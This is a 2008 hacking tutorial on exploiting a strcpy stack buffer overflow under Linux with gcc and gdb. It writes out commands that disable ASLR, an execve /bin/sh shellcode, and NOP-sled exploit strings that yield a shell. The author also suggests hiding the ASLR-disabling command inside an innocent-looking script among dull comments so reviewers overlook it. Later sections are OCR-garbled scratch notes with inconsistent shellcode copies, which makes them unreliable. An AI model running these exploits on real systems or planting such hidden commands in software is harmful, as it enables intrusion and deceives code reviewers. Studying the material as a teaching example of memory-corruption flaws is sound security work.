# **Exploiting Buffer overflows**

Version 1

OS: Zenwalk 5.2

**gcc:** default with zenwalk(4.2.3)

**By** Kalgecin (kalgecin[at]gmail.com)

7 December 2008

### ~oO Disclaimer Oo~

I'm to assume that you know what buffer overflows are, as I'm not going to discuss it here.. for that read "Smashing the stack for fun and profit" by Aleph1.

This documentation is to provide the users with basic knowledge of buffer overflows under recent gcc version. I'm not responsible for any text that is printed in this tutorial as it is intended for educational purposes only!!

#### ~oO Start Oo~

So to overflow this we need to disable a kernel protection first. For that we do:

kalgecin[hacking]\$ cat /proc/sys/kernel/randomize\_va\_space
1
kalgecin[hacking]\$ echo 0 > /proc/sys/kernel/randomize\_va\_space
kalgecin[hacking]\$ cat /proc/sys/kernel/randomize\_va\_space
0
kalgecin[hacking]\$

So now we have disabled the protection. Here's a copy of our vulnerable program:

```
kalgecin[hacking]$ cat vuln.c
#include <stdlib.h>
#include <stdlib.h>
#include <string.h>
int bof(char *string) {
    char buffer[1024];
    strcpy(buffer, string);
    return 1;
    }
    int main(int argc, char *argv[]) {
        bof(argv[1]);
        printf("Done..\n");
        return 1;
    }
```

This vulnerable program accepts an input and processes it with **strcpy** which does not do any bounds checking, so if we put an argument with say 1040 characters our stack will get overflowed.

We will compile it.

| kalgecin[hacking]\$ | gcc vuln.c -o vuln |
|---------------------|--------------------|
| kalgecin[hacking]\$ |                    |

Open a gdb

kalgecin[hacking]\$ gdb ./vuln -q
(gdb) r `perl -e 'print "AAAA"x1040'`
Starting program: /home/kalgecin/Desktop/hacking/vuln `perl -e 'print "AAAA"x1040'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

As we can see here 0x41414141 is the same as AAAA. Let us see the registers

| $ \begin{array}{llllllllllllllllllllllllllllllllllll$                                                                                                    |           |           |      |                 |
|----------------------------------------------------------------------------------------------------|-----------|-----------|------|-----------------|
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | (gdb) i r |           |      |                 |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | eax       | 0x1       | 1    |                 |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | ecx       | 0xbfffe3  | b8   | -1073749064     |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | edx       | 0x1041    | 4161 |                 |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | ebx       | 0xb7fbc   | ff4  | -1208233996     |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | esp       | 0xbfffe7  | c0   | 0xbfffe7c0      |
| esi $0xb7ffece0$ -1207964448<br>edi $0x0$ 0<br>eip $0x41414141$ $0x41414141$<br>eflags $0x210282$ [SF IF RF ID]<br>cs $0x73$ 115<br>ss $0x7b$ 123<br>ds $0x7b$ 123<br>es $0x7b$ 123<br>fs $0x0$ 0<br>gs $0x33$ 51<br>(gdb)                                                                        | ebp       | 0x41414   | 1141 | 0x41414141      |
| $\begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | esi       | 0xb7ffece | e0   | -1207964448     |
| eip       0x41414141       0x41414141         eflags       0x210282       [SF IF RF ID]         cs       0x73       115         ss       0x7b       123         ds       0x7b       123         es       0x7b       123         fs       0x0       0         gs       0x33       51         (gdb) | edi       | 0x0       | 0    |                 |
| eflags       0x210282       [ SF IF RF ID ]         cs       0x73       115         ss       0x7b       123         ds       0x7b       123         es       0x7b       123         fs       0x0       0         gs       0x33       51         (gdb)                                             | eip       | 0x41414   | 141  | 0x41414141      |
| cs       0x73       115         ss       0x7b       123         ds       0x7b       123         es       0x7b       123         fs       0x0       0         gs       0x33       51         (gdb)                                                                                                 | eflags    | 0x21028   | 32   | [ SF IF RF ID ] |
| ss 0x7b 123<br>ds 0x7b 123<br>es 0x7b 123<br>fs 0x0 0<br>gs 0x33 51<br>(gdb)                                                                                                    | CS        | 0x73      | 115  |                 |
| ds 0x7b 123<br>es 0x7b 123<br>fs 0x0 0<br>gs 0x33 51<br>(gdb)                                                                                                    | SS        | 0x7b      | 123  |                 |
| es 0x7b 123<br>fs 0x0 0<br>gs 0x33 51<br>(gdb)                                                                                                    | ds        | 0x7b      | 123  |                 |
| fs 0x0 0<br>gs 0x33 51<br>(gdb)                                                                                                    | es        | 0x7b      | 123  |                 |
| gs 0x33 51<br>(gdb)                                                                                                    | fs        | 0x0       | 0    |                 |
| (gdb)                                                                                                    | gs        | 0x33      | 51   |                 |
|                                                                                                    | (gdb)     |           |      |                 |

Pay attention to EIP. It points to our AAAA.

Now let's use a shell-code. This one has been generated by me and it spawns a shell:

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73 \x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\xcd \x80 (gdb) r `perl -e 'print

"\x90"x1040,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2 f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x8 0"'`

The program being debugged has been started already. Start it from the beginning? (y or n) y

Starting program: /home/kalgecin/Desktop/hacking/vuln `perl -e 'print

"\x90"x1040,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2 f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x8 0"'` Program received signal SIGSEGV, Segmentation fault. 0x90909090 in ?? () (gdb)

Now we are pointed to 90909090 which is our NOP sled. We add "AAAA" at the end of our exploit and adjust the number of nop's decreasing by 4 until we have 1414141 as our return address.

I got the value as: 993. So we now type:

(gdb) x/2000xb \$esp

And we get a lot of stuff. Look for something like:

From here we get the address of our NOP sled as: bf ff 6 50. Turning this to lilendian we get  $x50\xf6\xff\xbf$  and we replace that with our "AAAA" and we get something like this:

```
(gdb) r `perl -e 'print
"\x90"x993,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73\x6
8\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80","\x50\xf6\xff
\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kalgecin/Desktop/hacking/vuln `perl -e 'print
"\x90"x993,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73\x6
8\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\xcd\x80","\x50\xf6\xff
\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
```

(no debugging symbols found) (no debugging symbols found) (no debugging symbols found) sh-3.1\$

BANG!! We got our shell. We now disable the protection:

kalgecin[hacking]\$ cat /proc/sys/kernel/randomize\_va\_space
0
kalgecin[hacking]\$ echo 1 > /proc/sys/kernel/randomize\_va\_space
kalgecin[hacking]\$ cat /proc/sys/kernel/randomize\_va\_space
1
kalgecin[hacking]\$

And after repeating the exploit, we get...

(qdb) r `perl -e 'print "\x90"x993,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73\x6 8\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\xcd\x80","\x50\xf6\xff \xbf"' Starting program: /bin/bash `perl -e 'print "\x90"x993,"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73\x6 8\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\xcd\x80","\x50\xf6\xff \xbf"' (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) /bin/bash: 

So we end here.

If you want to exploit local programs, then disable the protection (as root :) not much help here) But you can make a useful script or a program and inside it added a code to run "echo 0 > /proc/sys/kernel/randomize\_va\_space" in a hidden place or a place with a lot of comments and make a line to execute the above piece of code. Mostly the reviser will ignore the comments (especially the boring ones) and not see the code above.

Good luck out there!! ©

# ~oO Conclusion Oo~

These exploits work as long as the va patch is disabled. To disable it you need root privileges. Next paper will focus on the va patch.

# ~oO The VA patch Oo~

The VA patch was applied in order for the buffer overflow to be much harder by randomizing where the starch of the program starts. Before the patch all programs started at the same address and so the return address was predictable from the stack information. Now the VA patch randomizes the location of the program in the stack making it virtually impossible.

### ~oO Hacking the VA patch Oo~

From here on I'm writing this as I'm experimenting and as my scratch pads so please sorry if I'll be not be clear

So let's try:

(gdb) r `perl -e 'print "\x90"x1032,"\x80\xda\xea\xbf","\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x5 1\x68\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\ xcd\x80"'`

The program being debugged has been started already. Start it from the beginning? (y or n) y

 $\label{eq:starting program: /home/kalgecin/Desktop/hacking/vuln `perl -e 'print "\x90"x1032,"\x80\xda\xea\xbf","\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\ xcd\x80"'`$ 

Program received signal SIGSEGV, Segmentation fault. 0x90909090 in ?? () (qdb) x/3000xb \$esp 0xbfc75850: 0x80 0xda 0xea 0xbf 0x31 0xc0 0x31 0xdb 0xbfc75858: 0x31 0xc9 0x31 0xd2 0xb0 0x46 0xcd 0x80 0xbfc75860: 0x51 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0xbfc75868: 0x62 0x69 0x6e 0x89 0xe3 0x51 0x53 0x89 0xbfc75870: 0xe1 0x31 0xc0 0xb0 0x0b 0x80 0x00 0xcd

| 0xbfc75                                                                                                    | 5878:                                                                                                    | 0xd8                                                                                                    | 0x58                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    | 0x90                                                                                                    | 0x33                                                                                                    | 0xf0                                                                                                    | 0xb7                                                                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| 0xbfc75                                                                                                    | 5880:                                                                                                    | 0x02                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x04                                                                                                    | 0x59                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    |
| 0xbfc75                                                                                                    | 5888:                                                                                                    | 0x10                                                                                                    | 0x59                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    | 0xd0                                                                                                    | 0x92                                                                                                    | 0x03                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 5890:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x01                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    |
| 0xbfc75                                                                                                    | 5898:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x09                                                                                                    | 0x82                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    |
| 0xbfc75                                                                                                    | 58a0:                                                                                                    | 0xf4                                                                                                    | 0x4f                                                                                                    | 0x03                                                                                                    | 0xb8                                                                                                    | 0xe0                                                                                                    | 0x7c                                                                                                    | 0x07                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 58a8:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0xd8                                                                                                    | 0x58                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    |
| 0xbfc75                                                                                                    | 58b0:                                                                                                    | 0x81                                                                                                    | 0x00                                                                                                    | 0xb1                                                                                                    | 0x9a                                                                                                    | 0x91                                                                                                    | 0xaa                                                                                                    | 0x66                                                                                                    | 0xf4                                                                                                    |
| 0xbfc75                                                                                                    | 58b8:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    |
| 0xbfc75                                                                                                    | 58c0:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0xa0                                                                                                    | 0xf7                                                                                                    | 0x06                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 58c8:                                                                                                    | 0xbd                                                                                                    | 0x32                                                                                                    | 0xf0                                                                                                    | 0xb7                                                                                                    | 0xf4                                                                                                    | 0x7f                                                                                                    | 0x07                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 58d0:                                                                                                    | 0x02                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x83                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    |
| 0xbfc75                                                                                                    | 58d8:                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x21                                                                                                    | 0x83                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    |
| 0xbfc75                                                                                                    | 58e0:                                                                                                    | 0xa9                                                                                                    | 0x83                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    | 0x02                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    |
| 0xbfc75                                                                                                    | 58e8:                                                                                                    | 0x04                                                                                                    | 0x59                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    | 0x00                                                                                                    | 0x84                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    |
| 0xbfc75                                                                                                    | 58f0:                                                                                                    | 0xf0                                                                                                    | 0x83                                                                                                    | 0x04                                                                                                    | 0x08                                                                                                    | 0xd0                                                                                                    | 0xa0                                                                                                    | 0x06                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 58f8:                                                                                                    | 0xfc                                                                                                    | 0x58                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    | 0x05                                                                                                    | 0x56                                                                                                    | 0x07                                                                                                    | 0xb8                                                                                                    |
| 0xbfc75                                                                                                    | 5900:                                                                                                    | 0x02                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0x00                                                                                                    | 0xff                                                                                                    | 0x75                                                                                                    | 0xc7                                                                                                    | 0xbf                                                                                                    |
| Туре                                                                                                    | <retu< td=""><td>ırn&gt; to</td><td>continu</td><td>ue, or q</td><td><retur< td=""><td>m&gt; to c</td><td>quitq</td><td></td><td></td></retur<></td></retu<>                                                                                                    | ırn> to                                                                                                    | continu                                                                                                    | ue, or q                                                                                                    | <retur< td=""><td>m&gt; to c</td><td>quitq</td><td></td><td></td></retur<>                                                                                                    | m> to c                                                                                                    | quitq                                                                                                    |                                                                                                    |                                                                                                    |
| Quit                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |
| (gdb) r                                                                                                    | `perl                                                                                                    | -e 'prin                                                                                                    | t                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |
| "\x90"x1032,"                                                                                                    | \x80\x                                                                                                    | da\xea                                                                                                    | \xbf","\                                                                                                    | \x31\xc                                                                                                    | 0\x31\                                                                                                    | xdb\x3                                                                                                    | 1\xc9\x                                                                                                    | 31\xd2                                                                                                    | \xb0\x46\xcd\x80\x5                                                                                                    |
| 1\x68\x2f\x2f\<br>xcd\x80"'`                                                                                                    | x73\x                                                                                                    | 68\x68                                                                                                    | \x2f\x6                                                                                                    | 52\x69\                                                                                                    | x6e\x8                                                                                                    | 9\xe3\>                                                                                                    | (51\x53                                                                                                    | \$\x89\x                                                                                                    | e1\x31\xc0\xb0\x0b\                                                                                                    |
| The pro                                                                                                    | aram                                                                                                    | heina c                                                                                                    | lebuaae                                                                                                    | ed has l                                                                                                    | neen st                                                                                                    | arted a                                                                                                    | lreadv                                                                                                    |                                                                                                    |                                                                                                    |
| inc pro                                                                                                    | gram                                                                                                    | being e                                                                                                    | ····                                                                                                    |                                                                                                    | ,<br>,                                                                                                    | unceu u                                                                                                    | neadyr                                                                                                    |                                                                                                    |                                                                                                    |
| Start it                                                                                                    | from t                                                                                                    | 'he bea                                                                                                    | innina?                                                                                                    | '(vorr                                                                                                    | 1) V                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |
| Start it                                                                                                    | from t                                                                                                    | he beg                                                                                                    | inning?                                                                                                    | (y or r                                                                                                    | ı) y                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |                                                                                                    |
| Start it<br>Starting progra                                                                                                    | from t<br>am: /h                                                                                                    | ine beg<br>iome/ka                                                                                                    | inning?<br>alaecin/                                                                                                    | ' (y or r<br>/Deskto                                                                                                    | n) y<br>p/hack                                                                                                    | ina/vulı                                                                                                    | n`perl                                                                                                    | -e 'prir                                                                                                    | ıt                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032."                                                                                                    | from t<br>am: /h<br>\x80\x                                                                                                    | ine beg<br>iome/ka<br>ida\xea                                                                                                    | inning?<br>algecin/<br>\xbf","\                                                                                                    | ' (y or r<br>/Deskto<br>\x31\xc                                                                                                    | n) y<br>p/hack<br>0\x31\;                                                                                                    | ing/vuli<br>xdb\x3                                                                                                    | n`perl<br>1\xc9\x                                                                                                    | -e 'prin<br>31\xd2                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f                                                                                                    | from t<br>am: /h<br>\x80\x<br>.x73\x                                                                                                    | ine beg<br>iome/ka<br>ida\xea<br>68\x68                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6                                                                                                    | ' (y or r<br>/Deskto<br>\x31\xc<br>52\x69\                                                                                                    | n) y<br>p/hack<br>0\x31\:<br>x6e\x8                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\>                                                                                                    | n`perl<br>1\xc9\x<br>(51\x53                                                                                                    | -e 'prir<br>31\xd2<br>\$\x89\x                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`                                                                                                    | from t<br>am: /h<br>\x80\x<br>\x73\x0                                                                                                    | ine beg<br>iome/ka<br>ida\xea<br>68\x68                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6                                                                                                    | ' (y or r<br>/Deskto<br>\x31\xc<br>62\x69\                                                                                                    | n) y<br>p/hack<br>0\x31\:<br>x6e\x8                                                                                                    | ing/vulı<br>xdb\x3<br>9\xe3\>                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53                                                                                                    | -e 'prin<br>31\xd2<br>8\x89\x                                                                                                    | nt<br>?\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x                                                                                                    | ine beg<br>iome/ka<br>ida\xea<br>68\x68                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6                                                                                                    | ' (y or r<br>/Deskto<br>\x31\xc<br>2\x69\                                                                                                    | p/hack<br>0\x31\:<br>x6e\x8                                                                                                    | ing/vulı<br>xdb\x3<br>9\xe3\>                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53                                                                                                    | -e 'prin<br>31\xd2<br>8\x89\x                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\xi<br>n recei                                                                                                    | ine beg<br>iome/ka<br>ida\xea<br>68\x68<br>ived sic                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>inal SIC                                                                                                    | ' (y or r<br>/Deskto<br>\x31\xc<br>52\x69\<br>GSEGV.                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation                                                                                                    | n `perl<br>1\xc9\x<br>x51\x53<br>1 fault.                                                                                                    | -e 'prir<br>31\xd2<br>\$\x89\x                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x<br>n recei<br>9090 i                                                                                                    | ine beg<br>ome/ka<br>ada\xea<br>68\x68<br>ived sig                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC                                                                                                    | (y or r<br>/Deskto<br>\x31\xc<br>62\x69\<br>GSEGV,                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\><br>entation                                                                                                    | n `perl<br>1\xc9\x<br>x51\x53<br>fault.                                                                                                    | -e 'prir<br>31\xd2<br>\$\x89\x                                                                                                    | nt<br>2\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(qdb) x                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x<br>n recei<br>9090 i<br>/3000;                                                                                                    | ine beg<br>iome/ka<br>ida\xea<br>68\x68<br>ived si <u>c</u><br>in ?? ()<br>xb \$esp                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC                                                                                                    | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme                                                                                                    | ing/vuli<br>xdb\x3:<br>9\xe3\><br>entation                                                                                                    | n `perl<br>1\xc9\x<br><51\x53<br>fault.                                                                                                    | -e 'prin<br>31\xd2<br>\\x89\x                                                                                                    | nt<br>?\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x<br>,x73\x<br>1<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0<br>0                                                                                                    | ine beg<br>ome/ka<br>da\xea<br>68\x68<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0<br>0xda                                                                                            | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,<br>0xea                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme<br>0xbf                                                                                                    | ing/vuli<br>xdb\x3:<br>9\xe3\x<br>entation<br>0x31                                                                                                    | n `perl<br>1\xc9\x<br>51\x53<br>fault.<br>0xc0                                                                                                    | -e 'prir<br>31\xd2<br>3\x89\x<br>0x31                                                                                                    | nt<br>:\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x<br>n recei<br>9090 i<br>/3000;<br>od0:<br>od8;                                                                                                    | ived sig<br>(ived sig<br>(in ?? ())<br>(in \$esp<br>(0x80<br>(0x31                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>jnal SIC<br>0<br>0xda<br>0xc9                                                                                    | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,<br>0xea<br>0x231                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme<br>0xbf<br>0xd2                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0                                                                                                    | n `perl<br>1\xc9\x<br>51\x53<br>fault.<br>0xc0<br>0x46                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>,x73\x0<br>n recei<br>9090 i<br>/3000;<br>od0:<br>od8:<br>od8:<br>oe0;                                                                                                    | ine beg<br>ome/ka<br>da\xea<br>68\x68<br>ived si <u>c</u><br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51                                                                                                    | inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0<br>0xda<br>0xc9<br>0x68                                                                            | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,<br>0xea<br>0x31<br>0x2f                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73                                                                                                    | n `perl<br>1\xc9\x<br>51\x53<br>fault.<br>0xc0<br>0x46<br>0x68                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68                                                                                                    | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/3000;<br>od0;<br>od0;<br>od8;<br>od8;<br>oe8;                                                                                                    | ived sig<br>ived sig<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69                                                                         | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,<br>0xea<br>0x31<br>0x2f<br>0x6e                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51                                                                                                    | -e 'prir<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53                                                                                                    | ot<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f<br>0x89                                                                                                    |
